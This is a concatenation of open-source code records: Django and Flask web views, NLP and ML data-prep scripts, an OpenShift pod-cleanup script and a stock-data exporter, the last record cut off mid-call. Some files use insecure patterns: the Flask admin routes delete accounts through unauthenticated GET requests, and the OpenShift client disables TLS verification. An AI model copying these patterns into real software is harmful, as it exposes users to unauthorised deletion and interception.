"name"}]} +{"seq_id": "3511909", "text": "from django.shortcuts import render, HttpResponse, redirect\nfrom .forms import *\nfrom .models import *\nfrom django.contrib import messages\n\n\ndef index(request):\n form = NameForm()\n return render(request, 'index.html', {\"form1\":form})\n\ndef home(request):\n if request.method==\"POST\":\n obj = StudentForm(request.POST,request.FILES)\n if obj.is_valid():\n obj.save()\n messages.success(request,\"Student Data Inserted.\")\n return redirect('show')\n else:\n return HttpResponse(\"ERROR\") \n studentform = StudentForm()\n return render(request,'student.html', {\"student\":studentform})\n\ndef showdata(request):\n data = Student.objects.all()\n return render(request, 'show.html',{\"students\":data})\n\ndef deletestudent(request,id):\n obj = Student.objects.get(id=id)\n print(obj)\n obj.delete()\n messages.success(request,\"Student Data Deleted.\")\n return redirect('show')\n\ndef updatestudent(request,id):\n student = Student.objects.get(id=id)\n if request.method == 'POST': \n form = StudentForm(request.POST, request.FILES , instance = student) \n if form.is_valid(): \n form.save() \n messages.success(request,'Student Updated!!!!!!!')\n return redirect(\"/show\") \n return render(request, 'updatestudent.html',{'data':student})\n\n\ndef searchstudent(request):\n name = request.POST['searchtext']\n data = Student.objects.filter(name__icontains=name)\n return render(request, 'show.html',{\"students\":data})", "sub_path": "formproject/form/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1543, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.shortcuts.render", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 16, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 16, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 17, "usage_type": "call"}, {"api_name": "django.shortcuts.HttpResponse", "line_number": 19, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 21, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 25, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 31, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 31, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 32, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 40, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 40, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 41, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 42, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "496505210", "text": "# Because I was too lazy to create separate data tables, this is a file \n# to transform the dataframe containing our information into different forms\n\nimport pandas as pd\nimport nltk\nfrom nltk.corpus import stopwords #For stopwords\nimport numpy as np\n\nstop_words_nltk = stopwords.words('english')\n#stop_words = [\"the\",\"it\",\"she\",\"he\", \"a\"] #Uncomment this line if you want to use your own list of stopwords.\n\n#The stemmers and lemmers need to be initialized before bing run\nporter = nltk.stem.porter.PorterStemmer()\nsnowball = 
nltk.stem.snowball.SnowballStemmer('english')\nwordnet = nltk.stem.WordNetLemmatizer()\n\ndef normlizeTokens(tokenLst, stopwordLst = None, stemmer = None, lemmer = None):\n #We can use a generator here as we just need to iterate over it\n\n #Lowering the case and removing non-words\n workingIter = (w.lower() for w in tokenLst if w.isalpha())\n\n #Now we can use the semmer, if provided\n if stemmer is not None:\n workingIter = (stemmer.stem(w) for w in workingIter)\n \n #And the lemmer\n if lemmer is not None:\n workingIter = (lemmer.lemmatize(w) for w in workingIter)\n \n #And remove the stopwords\n if stopwordLst is not None:\n workingIter = (w for w in workingIter if w not in stopwordLst)\n #We will return a list with the stopwords removed\n return list(workingIter)\n\ndef get_clean_data():\n '''\n '''\n data = pd.read_pickle('top_posts831.pkl')\n df = data.drop_duplicates(['com_id'], keep = 'first').set_index('com_id')\n df = df.loc[:,['sub_text','com_text','com_delta_received', 'com_delta_from_op', 'com_upvotes']]\n df['com_delta_from_op']= df['com_delta_from_op'].apply(lambda x: False if x==None else x==True)\n\n df.dropna(axis=0, how='any', inplace = True)\n df = df[(df['com_text']!='[deleted]')&(df['com_text']!='[removed]')]\n\n return(df)\n\ndf = get_clean_data()\ndf['tokenized_com'] = df['com_text'].apply(lambda x: nltk.word_tokenize(x))\ndf['normalized_com'] = df['tokenized_com'].apply(lambda x: normlizeTokens(x, stopwordLst = stop_words_nltk, stemmer = snowball))\n\ndf['tokenized_sub'] = df['sub_text'].apply(lambda x: nltk.word_tokenize(x))\ndf['normalized_sub'] = df['tokenized_sub'].apply(lambda x: normlizeTokens(x, stopwordLst = stop_words_nltk, stemmer = snowball))\n\ndf.to_pickle(\"cmv_data.pkl\")\n \n\n", "sub_path": "transform_df.py", "file_name": "transform_df.py", "file_ext": "py", "file_size_in_byte": 2321, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "nltk.corpus.stopwords.words", "line_number": 9, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 9, "usage_type": "name"}, {"api_name": "nltk.stem.porter.PorterStemmer", "line_number": 13, "usage_type": "call"}, {"api_name": "nltk.stem", "line_number": 13, "usage_type": "attribute"}, {"api_name": "nltk.stem.snowball.SnowballStemmer", "line_number": 14, "usage_type": "call"}, {"api_name": "nltk.stem", "line_number": 14, "usage_type": "attribute"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 15, "usage_type": "call"}, {"api_name": "nltk.stem", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 40, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 51, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "508296318", "text": "from sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import accuracy_score\nfrom ..utils.decorators import make_deprecated\n\nimport trixi\n\nfrom delira import get_backends\n\nif \"TORCH\" in get_backends():\n import torch\n\n from .train_utils import pytorch_tensor_to_numpy, float_to_pytorch_tensor \n @make_deprecated(trixi)\n class AurocMetricPyTorch(torch.nn.Module):\n \"\"\"\n Metric to Calculate AuROC\n\n .. deprecated:: 0.1\n :class:`AurocMetricPyTorch` will be removed in next release and is\n deprecated in favor of ``trixi.logging`` Modules\n\n .. 
warning::\n :class:`AurocMetricPyTorch` will be removed in next release\n\n \"\"\"\n def __init__(self):\n super().__init__()\n\n def forward(self, outputs: torch.Tensor, targets: torch.Tensor):\n \"\"\"\n Actual AuROC calculation\n\n Parameters\n ----------\n outputs : torch.Tensor\n predictions from network\n targets : torch.Tensor\n training targets\n\n Returns\n -------\n torch.Tensor\n auroc value\n\n \"\"\"\n if outputs.dim() == 2:\n outputs = torch.argmax(outputs, dim=1)\n score = roc_auc_score(pytorch_tensor_to_numpy(targets),\n pytorch_tensor_to_numpy(outputs))\n return float_to_pytorch_tensor(score)\n\n\n @make_deprecated(trixi)\n class AccuracyMetricPyTorch(torch.nn.Module):\n \"\"\"\n Metric to Calculate Accuracy\n \n .. deprecated:: 0.1\n :class:`AccuracyMetricPyTorch` will be removed in next release and is\n deprecated in favor of ``trixi.logging`` Modules\n\n .. warning::\n class:`AccuracyMetricPyTorch` will be removed in next release\n\n \"\"\"\n def __init__(self, normalize=True, sample_weight=None):\n \"\"\"\n\n Parameters\n ----------\n normalize : bool, optional (default=True)\n If ``False``, return the number of correctly classified samples.\n Otherwise, return the fraction of correctly classified samples.\n\n sample_weight : array-like of shape = [n_samples], optional\n Sample weights.\n\n \"\"\"\n super().__init__()\n self.normalize = normalize\n self.sample_weight = sample_weight\n\n def forward(self, outputs: torch.Tensor, targets: torch.Tensor):\n \"\"\"\n Actual accuracy calcuation\n\n Parameters\n ----------\n outputs : torch.Tensor\n predictions from network\n targets : torch.Tensor\n training targets\n\n Returns\n -------\n torch.Tensor\n accuracy value\n\n \"\"\"\n outputs = outputs > 0.5\n if outputs.dim() == 2:\n outputs = torch.argmax(outputs, dim=1)\n score = accuracy_score(pytorch_tensor_to_numpy(targets),\n pytorch_tensor_to_numpy(outputs),\n self.normalize, self.sample_weight)\n return float_to_pytorch_tensor(score)\n", "sub_path": "delira/training/metrics.py", "file_name": "metrics.py", "file_ext": "py", "file_size_in_byte": 3270, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "delira.get_backends", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 47, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 48, "usage_type": "call"}, {"api_name": "train_utils.pytorch_tensor_to_numpy", "line_number": 48, "usage_type": "call"}, {"api_name": "train_utils.pytorch_tensor_to_numpy", "line_number": 49, "usage_type": "call"}, {"api_name": "train_utils.float_to_pytorch_tensor", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.decorators.make_deprecated", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 83, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 102, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 103, "usage_type": "call"}, {"api_name": "train_utils.pytorch_tensor_to_numpy", "line_number": 103, "usage_type": "call"}, {"api_name": "train_utils.pytorch_tensor_to_numpy", "line_number": 104, "usage_type": "call"}, {"api_name": "train_utils.float_to_pytorch_tensor", "line_number": 106, 
"usage_type": "call"}, {"api_name": "utils.decorators.make_deprecated", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "175802733", "text": "from flask import flash, redirect, url_for\nfrom app import db\nfrom app.admin import bp\nfrom app.models import Parent, Student, Teacher\n\n\n@bp.route('/profile/parent//delete-account')\ndef delete_parent_account(username):\n parent = Parent.query.filter_by(username=username).first_or_404()\n db.session.delete(parent)\n db.session.commit()\n flash(f'Your parent account {parent.username} was successfully deleted')\n return redirect(url_for('main.home'))\n\n\n@bp.route('/profile/student//delete-account')\ndef delete_student_account(username):\n student = Student.query.filter_by(username=username).first_or_404()\n db.session.delete(student)\n db.session.commit()\n flash(f'Your student account {student.username} was successfully deleted')\n return redirect(url_for('main.home'))\n\n\n@bp.route('/profile/teacher//delete-account')\ndef delete_teacher_account(username):\n teacher = Teacher.query.filter_by(username=username).first_or_404()\n db.session.delete(teacher)\n db.session.commit()\n flash(f'Your teacher account {teacher.username} was successfully deleted')\n return redirect(url_for('main.home'))\n", "sub_path": "version1/app/admin/routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 1160, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "app.models.Parent.query.filter_by", "line_number": 9, "usage_type": "call"}, {"api_name": "app.models.Parent.query", "line_number": 9, "usage_type": "attribute"}, {"api_name": "app.models.Parent", "line_number": 9, "usage_type": "name"}, {"api_name": "app.db.session.delete", "line_number": 10, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 10, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 10, "usage_type": "name"}, {"api_name": "app.db.session.commit", "line_number": 11, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 11, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 11, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 12, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 13, "usage_type": "call"}, {"api_name": "app.admin.bp.route", "line_number": 7, "usage_type": "call"}, {"api_name": "app.admin.bp", "line_number": 7, "usage_type": "name"}, {"api_name": "app.models.Student.query.filter_by", "line_number": 18, "usage_type": "call"}, {"api_name": "app.models.Student.query", "line_number": 18, "usage_type": "attribute"}, {"api_name": "app.models.Student", "line_number": 18, "usage_type": "name"}, {"api_name": "app.db.session.delete", "line_number": 19, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 19, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 19, "usage_type": "name"}, {"api_name": "app.db.session.commit", "line_number": 20, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 20, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 22, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 22, "usage_type": "call"}, {"api_name": "app.admin.bp.route", "line_number": 16, "usage_type": "call"}, 
{"api_name": "app.admin.bp", "line_number": 16, "usage_type": "name"}, {"api_name": "app.models.Teacher.query.filter_by", "line_number": 27, "usage_type": "call"}, {"api_name": "app.models.Teacher.query", "line_number": 27, "usage_type": "attribute"}, {"api_name": "app.models.Teacher", "line_number": 27, "usage_type": "name"}, {"api_name": "app.db.session.delete", "line_number": 28, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 28, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 28, "usage_type": "name"}, {"api_name": "app.db.session.commit", "line_number": 29, "usage_type": "call"}, {"api_name": "app.db.session", "line_number": 29, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 29, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 31, "usage_type": "call"}, {"api_name": "app.admin.bp.route", "line_number": 25, "usage_type": "call"}, {"api_name": "app.admin.bp", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "404530889", "text": "import kubernetes, sys\nfrom openshift.dynamic import DynamicClient\nimport urllib3\nurllib3.disable_warnings()\n\napi_key = sys.argv[1]\ntmp_output = \"/tmp/ccit-teams-tenants.txt\"\nskip_projects = list()\nwith open(tmp_output) as f:\n teams_tenants = list(f)\n\nconfiguration = kubernetes.client.Configuration()\nconfiguration.api_key = {'authorization': 'Bearer {}'.format(api_key)}\nconfiguration.host = 'https://paas.psi.redhat.com:443'\nconfiguration.verify_ssl = False\nkubernetes.client.Configuration.set_default(configuration)\nk8s_client = kubernetes.client.ApiClient(configuration)\ndyn_client = DynamicClient(k8s_client)\nv1_projects = dyn_client.resources.get(api_version='project.openshift.io/v1', kind='Project')\nprojects = v1_projects.get()\nv1_templates = dyn_client.resources.get(api_version='template.openshift.io/v1',\n kind='Template', singular_name='template')\nv1_pods = dyn_client.resources.get(api_version='v1', kind='Pod')\n\ninventory = dict()\nfor project in projects.items:\n if project.metadata.name.startswith('jenkins-csb-'):\n pods = v1_pods.get(namespace=project.metadata.name)\n for pod in pods.items:\n if pod.status.phase == 'Failed':\n if project.metadata.name not in inventory.keys():\n inventory[project.metadata.name] = list()\n inventory[project.metadata.name].append(pod.metadata.name)\n\nif len(inventory) > 0:\n for project in inventory.keys():\n if project in skip_projects:\n continue\n for pod in inventory[project]:\n print(\"Removing pod {} in project {}\".format(pod, project))\n v1_pods.delete(namespace=project, name=pod)\nelse:\n print(\"Failed pods not found\")", "sub_path": "openshift/get_pods_errored.py", "file_name": "get_pods_errored.py", "file_ext": "py", "file_size_in_byte": 1742, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "urllib3.disable_warnings", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "kubernetes.client.Configuration", "line_number": 12, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 12, "usage_type": "attribute"}, {"api_name": "kubernetes.client.Configuration.set_default", "line_number": 16, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 16, "usage_type": "attribute"}, {"api_name": 
"kubernetes.client.ApiClient", "line_number": 17, "usage_type": "call"}, {"api_name": "kubernetes.client", "line_number": 17, "usage_type": "attribute"}, {"api_name": "openshift.dynamic.DynamicClient", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "294604182", "text": "from kiwoom import *\nimport pandas as pd\nfrom datetime import datetime\nimport time\n\nkiwoom = Kiwoom()\nkiwoom.CommConnect()\nprint(\"로그인\")\n\nkospi = kiwoom.GetCodeListByMarket('0')\nkosdaq = kiwoom.GetCodeListByMarket('10')\ncodes = kospi + kosdaq\n\ndata = []\n\nfor code in codes:\n name = kiwoom.GetMasterCodeName(code)\n os_Cnt = kiwoom.GetMasterListedStockCnt(code)/10000\n Suv_days = (datetime.today().year - int(kiwoom.GetMasterListedStockDate(code)[0:4]))*365 \\\n + (datetime.today().month - int(kiwoom.GetMasterListedStockDate(code)[4:6]))*30 \\\n +(datetime.today().day - int(kiwoom.GetMasterListedStockDate(code)[6:]))\n\n if kiwoom.GetMasterConstruction(code) == '정상':\n const = ' '\n else:\n const = kiwoom.GetMasterConstruction(code)\n\n if ('거래정지' or '관리종목' or '투자유의종목') in kiwoom.GetMasterStockState(code):\n S_state = '제외'\n else:\n S_state = ' '\n\n\n data.append((code, name, os_Cnt, Suv_days, const, S_state))\n\n\n\n\ndf = pd.DataFrame(data=data, columns=['code', '종목명', '유동주식 수(만)', '상장후 운영일수',\n '감리유의', '상태유의']).set_index('code')\n## 서버에서 PER, PBR을 일일이 요청하다보니 시간이 너무 많이 걸린다 -> 크롤링이나 웹스크래핑으로 데이터 수집하는게 더 빠를듯\ndf.to_excel(\"code.xlsx\")\n\n", "sub_path": "kw_tool/To_Excel.py", "file_name": "To_Excel.py", "file_ext": "py", "file_size_in_byte": 1424, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "kiwoom.CommConnect", "line_number": 7, "usage_type": "call"}, {"api_name": "kiwoom.GetCodeListByMarket", "line_number": 10, "usage_type": "call"}, {"api_name": "kiwoom.GetCodeListByMarket", "line_number": 11, "usage_type": "call"}, {"api_name": "kiwoom.GetMasterCodeName", "line_number": 17, "usage_type": "call"}, {"api_name": "kiwoom.GetMasterListedStockCnt", "line_number": 18, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "name"}, {"api_name": "kiwoom.GetMasterListedStockDate", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 20, "usage_type": "name"}, {"api_name": "kiwoom.GetMasterListedStockDate", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 21, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 21, "usage_type": "name"}, {"api_name": "kiwoom.GetMasterListedStockDate", "line_number": 21, "usage_type": "call"}, {"api_name": "kiwoom.GetMasterConstruction", "line_number": 23, "usage_type": "call"}, {"api_name": "kiwoom.GetMasterConstruction", "line_number": 26, "usage_type": "call"}, {"api_name": "kiwoom.GetMasterStockState", "line_number": 28, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "504861273", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\nscores = []\nratings = []\nwith open('scores_and_ratings.txt') as f:\n lines = f.readlines()\n for line in lines:\n splitLine = line.split(',')\n scores.append(float(splitLine[0]))\n ratings.append(float(splitLine[1]))\nf.close()\nprint(np.corrcoef(ratings, scores))\n\n#plt.plot(ratings, 
scores)\nplt.scatter(ratings, scores)\nplt.savefig('plot.png')\n\n", "sub_path": "exercise_1/investigations/hospitals_and_patients/plot_correlation.py", "file_name": "plot_correlation.py", "file_ext": "py", "file_size_in_byte": 420, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.corrcoef", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}]} +{"seq_id": "76635353", "text": "import os\nimport matlab.engine\nimport numpy as np\nimport time\nimport shutil\nfrom os import listdir\nfrom os.path import isfile, join\nfrom sklearn.model_selection import train_test_split\n\nimport keras \nfrom keras.datasets import mnist\nfrom keras.layers import Conv2D, MaxPooling2D, AveragePooling2D\nfrom keras.layers import Dense, Flatten\nfrom keras import optimizers\nfrom keras.models import Sequential\nfrom keras.layers import Input, Lambda, Dense, Flatten\nfrom keras.models import Model\nfrom keras.applications.vgg16 import VGG16\nfrom keras.applications.vgg16 import preprocess_input\nfrom keras.preprocessing import image\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nimport keras.backend as K\nimport numpy as np\nfrom glob import glob\nimport matplotlib.pyplot as plt\n\n\n\n#get filenames for data\nnames = ['GraceSpecs', 'MarcSpecs', 'PeteSpecs']\nsubDirs = ['fallingSitting', 'fallingStanding', 'fallingWalking', 'Movement', 'Sitting', 'Walking']\n\n#get filenames for data\npath = \"../../../ECE_Senior_Design_Our_Data\"\nfallingSittingFiles = []\nfallingStandingFiles = []\nfallingWalkingFiles = []\nmovementFiles = []\nsittingFiles = []\nwalkingFiles = []\n\nfor name in names:\n fallingSittingFiles = fallingSittingFiles + [(path + \"/\" + name + \"/\" + subDirs[0] + \"/\" + f) for f in listdir(join(path, name, subDirs[0])) if isfile(join(path, name, subDirs[0], f))]\n fallingStandingFiles = fallingStandingFiles + [(path + \"/\" + name + \"/\" + subDirs[1] + \"/\" + f) for f in listdir(join(path, name, subDirs[1])) if isfile(join(path, name, subDirs[1], f))]\n fallingWalkingFiles = fallingWalkingFiles + [(path + \"/\" + name + \"/\" + subDirs[2] + \"/\" + f) for f in listdir(join(path, name, subDirs[2])) if isfile(join(path, name, subDirs[2], f))]\n movementFiles = movementFiles + [(path + \"/\" + name + \"/\" + subDirs[3] + \"/\" + f) for f in listdir(join(path, name, subDirs[3])) if isfile(join(path, name, subDirs[3], f))]\n sittingFiles = sittingFiles + [(path + \"/\" + name + \"/\" + subDirs[4] + \"/\" + f) for f in listdir(join(path, name, subDirs[4])) if isfile(join(path, name, subDirs[4], f))]\n walkingFiles = walkingFiles + [(path + \"/\" + name + \"/\" + subDirs[5] + \"/\" + f) for f in listdir(join(path, name, subDirs[5])) if isfile(join(path, name, subDirs[5], f))]\n\n#make classification list\nresultsFallingSitting = [0] * len(fallingSittingFiles)\nresultsFallingStanding = [1] * len(fallingStandingFiles)\nresultsFallingWalking = [2] * len(fallingWalkingFiles)\n\nresultsMovement = [3] * len(movementFiles)\nresultsSitting = [4] * len(sittingFiles)\nresultsWalking = [5] * len(walkingFiles)\n\n#prepare data for feature selection\nfallingSittingFiles = 
np.array(fallingSittingFiles)\nfallingStandingFiles = np.array(fallingStandingFiles)\nfallingWalkingFiles = np.array(fallingWalkingFiles)\n\nmovementFiles = np.array(movementFiles)\nsittingFiles = np.array(sittingFiles)\nwalkingFiles = np.array(walkingFiles)\n\nfallingSittingData_Train, fallingSittingData_Test, fallingSittingData_TrainResults, fallingSittingData_TestResults = train_test_split(fallingSittingFiles, resultsFallingSitting, test_size = 0.3)\nfallingStandingData_Train, fallingStandingData_Test, fallingStandingData_TrainResults, fallingStandingData_TestResults = train_test_split(fallingStandingFiles, resultsFallingStanding, test_size = 0.3)\nfallingWalkingData_Train, fallingWalkingData_Test, fallingWalkingData_TrainResults, fallingWalkingData_TestResults = train_test_split(fallingWalkingFiles, resultsFallingWalking, test_size = 0.3)\n\nmovementData_Train, movementData_Test, movementData_TrainResults, movementData_TestResults = train_test_split(movementFiles, resultsMovement, test_size = 0.3)\nsittingData_Train, sittingData_Test, sittingData_TrainResults, sittingData_TestResults = train_test_split(sittingFiles, resultsSitting, test_size = 0.3)\nwalkingData_Train, walkingData_Test, walkingData_TrainResults, walkingData_TestResults = train_test_split(walkingFiles, resultsWalking, test_size = 0.3)\n\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN\")\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train\")\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test\")\n\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/fallingSittingFiles\")\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/fallingSittingFiles\")\n\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/fallingStandingFiles\")\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/fallingStandingFiles\")\n\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/fallingWalkingFiles\")\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/fallingWalkingFiles\")\n\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/movementFiles\")\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/movementFiles\")\n\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/sittingFiles\")\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/sittingFiles\")\n\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/walkingFiles\")\nos.mkdir(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/walkingFiles\")\n\nfor spec in fallingSittingData_Train:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/fallingSittingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\nfor spec in fallingSittingData_Test:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/fallingSittingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\n\nfor spec in fallingStandingData_Train:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/fallingStandingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\nfor spec in fallingStandingData_Test:\n shutil.copy(spec, 
\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/fallingStandingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\n\nfor spec in fallingWalkingData_Train:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/fallingWalkingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\nfor spec in fallingWalkingData_Test:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/fallingWalkingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\n\nfor spec in movementData_Train:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/movementFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\nfor spec in movementData_Test:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/movementFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\n\nfor spec in sittingData_Train:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/sittingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\nfor spec in sittingData_Test:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/sittingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\n\nfor spec in walkingData_Train:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train/walkingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\nfor spec in walkingData_Test:\n shutil.copy(spec, \"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test/walkingFiles/\"+ \"_\" + spec.rsplit('/', 5)[-2] + \"_\" + spec.rsplit('/', 5)[-3] + spec.rsplit('/', 5)[-1])\n\nfrom keras.preprocessing.image import ImageDataGenerator\n\ntrain_datagen = ImageDataGenerator(rescale = 1./255,\n shear_range = 0.2,\n zoom_range = 0.2,\n horizontal_flip = True)\n\ntest_datagen = ImageDataGenerator(rescale = 1./255)\n\ntraining_set = train_datagen.flow_from_directory(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/train\",\n target_size = (224, 224),\n batch_size = 8,\n subset=\"training\",\n class_mode = 'categorical')\n\ntest_set = train_datagen.flow_from_directory(\"../../../ECE_Senior_Design_Our_Data/specsForMulticlassCNN/test\",\n target_size = (224, 224),\n batch_size = 8,\n class_mode = 